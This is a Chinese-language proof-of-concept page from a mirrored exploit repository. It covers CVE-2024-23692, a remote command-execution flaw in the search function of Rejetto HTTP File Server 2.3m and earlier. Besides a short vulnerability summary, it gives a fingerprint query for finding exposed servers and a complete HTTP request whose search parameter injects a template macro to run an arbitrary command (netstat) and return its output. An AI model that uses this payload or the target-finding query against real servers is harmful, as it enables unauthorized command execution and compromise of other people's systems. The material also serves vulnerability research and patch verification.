admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-07-30 14:34:09 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/Rejetto/RejettoHTTP文件服务器search存在命令执行漏洞(CVE-2024-23692).md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

34 lines
1.5 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Rejetto HTTP文件服务器search存在命令执行漏洞(CVE-2024-23692)
# 一、漏洞简介
Rejetto HTTP文件服务器是一款免费的、跨平台的、基于Java的轻量级HTTP文件服务器软件。它允许用户通过Web浏览器访问和管理文件支持上传、下载、删除、重命名、创建目录等操作。 Rejetto HTTP文件服务器 search接口处存在RCE漏洞(CVE-2024-23692),恶意攻击者可能利用此漏洞执行恶意命令,获取服务器敏感信息,最终可能导致服务器失陷。
# 二、影响版本
+ Rejetto HTTP File Server <= 2.3m
# 三、资产测绘
```http
app="HFS"
```
+ 特征
![1718116518836-b92544c4-a811-4dee-8285-756a066df0ce.png](./img/-gVG0vk06azCeMDZ/1718116518836-b92544c4-a811-4dee-8285-756a066df0ce-300730.png)
# 四、漏洞复现
```java
GET /?n=%0A&cmd=netstat&search=%25xxx%25url:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.} HTTP/1.1
Host:127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close
```
![1718116766397-856eb67d-c89a-4559-a5b4-662267245327.png](./img/-gVG0vk06azCeMDZ/1718116766397-856eb67d-c89a-4559-a5b4-662267245327-686273.png)
> 更新: 2024-06-17 09:34:03
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ksyz94lfputxy1uv>
Reference in New Issue View Git Blame Copy Permalink